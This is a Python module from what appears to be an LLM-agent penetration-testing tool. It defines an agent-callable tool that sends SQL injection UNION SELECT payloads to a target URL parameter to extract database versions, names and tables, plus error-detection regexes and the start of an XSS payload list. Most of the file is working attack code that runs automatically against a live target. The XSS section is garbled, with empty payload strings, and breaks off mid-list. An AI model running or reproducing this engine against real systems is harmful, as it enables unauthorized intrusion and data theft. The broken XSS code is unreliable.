"""
agents/exploit_engine.py — Part 3: Exploitation Attempt Engine
Accepts Part 2 vuln dict and confirms vulnerabilities with safe PoC exploits.
Run standalone: python -m agents.exploit_engine --vulns reports/vulns/vulns_*.json
Or via main.py: python main.py --target example.com --parts 1,2,3
"""
import re
import json
import time
import socket
import argparse
import urllib.parse
from dataclasses import asdict
from typing import Optional
import requests
from bs4 import BeautifulSoup
from rich.panel import Panel
from rich.table import Table
from langchain_groq import ChatGroq
from langchain_openai import ChatOpenAI
from langchain.agents import AgentExecutor, create_tool_calling_agent
from langchain_core.prompts import ChatPromptTemplate
from langchain_core.tools import tool
from core.models import ExploitResult, ExploitSession, make_id
from core.utils import console, safe_get, safe_post, save_json, save_markdown
from core.config import (GROQ_API_KEY, GROQ_MODEL_DEFAULT, GROQ_MODELS,
GEMINI_API_KEY, GEMINI_MODEL_DEFAULT,
EXPLOIT_DIR, MAX_EXPLOIT_ATTEMPTS, LLM_PROVIDER)
# ── Global state ─────────────────────────────────────────
session: ExploitSession = None
DRY_RUN: bool = False
def _add(r: ExploitResult):
session.add_result(r)
color = {"CONFIRMED":"bold red","FAILED":"dim","SKIPPED":"yellow","ERROR":"orange3"}.get(r.status,"white")
console.print(f" [{color}]{r.status:10}[/{color}] {r.vuln_category:15} {r.vuln_title[:55]}")
# ══════════════════════════════════════════════════════════
# MODULE 1 — SQLI DATA EXTRACTION
# ══════════════════════════════════════════════════════════
SQLI_EXTRACT = [
("MySQL version", "' UNION SELECT version(),NULL,NULL--", r"(\d+\.\d+\.\d+[^\s]*)"),
("MySQL db name", "' UNION SELECT database(),NULL,NULL--", r"([a-zA-Z0-9_]{3,30})"),
("MySQL tables", "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database() LIMIT 5--", r"([a-z_]{3,20})"),
("PostgreSQL ver", "' UNION SELECT version(),NULL,NULL--", r"(PostgreSQL\s[\d.]+)"),
("MSSQL version", "' UNION SELECT @@version,NULL,NULL--", r"(Microsoft SQL Server\s[\d]+)"),
("DB error reveal", "'", r"(sql syntax|ORA-|pg_query|unclosed quotation)"),
]
DB_ERR = re.compile(r"(sql syntax|mysql_fetch|ORA-\d{5}|pg_query|unclosed quotation|"
r"Warning.*mysql|SQLSTATE|Microsoft OLE DB|Invalid query)", re.IGNORECASE)
@tool
def sqli_extract(url: str, vulnerable_param: str) -> str:
"""
Confirm SQLi by extracting DB version and table names via safe UNION SELECT.
Never modifies data — SELECT only.
"""
console.print(f"\n[cyan]→ SQLi extract:[/cyan] {url} param={vulnerable_param}")
parsed = urllib.parse.urlparse(url)
base = urllib.parse.parse_qs(parsed.query)
if DRY_RUN:
_add(ExploitResult(exploit_id=make_id("sqli_dryrun",url), vuln_title="SQLi extract (dry run)",
vuln_category="SQLi", target_url=url, status="SKIPPED",
technique="UNION SELECT version(),database()", request_sent=f"[dry-run]",
response_snippet="No request sent", impact="DB version, table names, potential full dump.",
cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run"))
return json.dumps({"status":"dry_run"})
for label, payload, pattern in SQLI_EXTRACT:
p = dict(base); p[vulnerable_param] = [payload]
test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True)))
r = safe_get(test_url)
if not r: continue
err = DB_ERR.search(r.text)
match = re.search(pattern, r.text, re.IGNORECASE)
if match or err:
extracted = (match or err).group(1)
_add(ExploitResult(exploit_id=make_id(label,url), vuln_title=f"SQLi confirmed: {label}",
vuln_category="SQLi", target_url=test_url, status="CONFIRMED",
technique=f"UNION SELECT in param '{vulnerable_param}'",
request_sent=f"GET {test_url[:120]}",
response_snippet=f"Extracted: {extracted[:100]}",
impact="Full DB enumeration possible — tables, columns, row data, credentials.",
cvss_score=9.8, severity="CRITICAL",
evidence_type="data_leak" if match else "error_message",
notes=f"Payload: {payload}"))
return json.dumps({"confirmed":True, "label":label, "extracted":extracted}, indent=2)
return json.dumps({"confirmed":False})
# ══════════════════════════════════════════════════════════
# MODULE 2 — XSS POC
# ══════════════════════════════════════════════════════════
XSS_POC = [
('', r'alert.*XSS-POC'),
('
', r'onerror=alert'),
('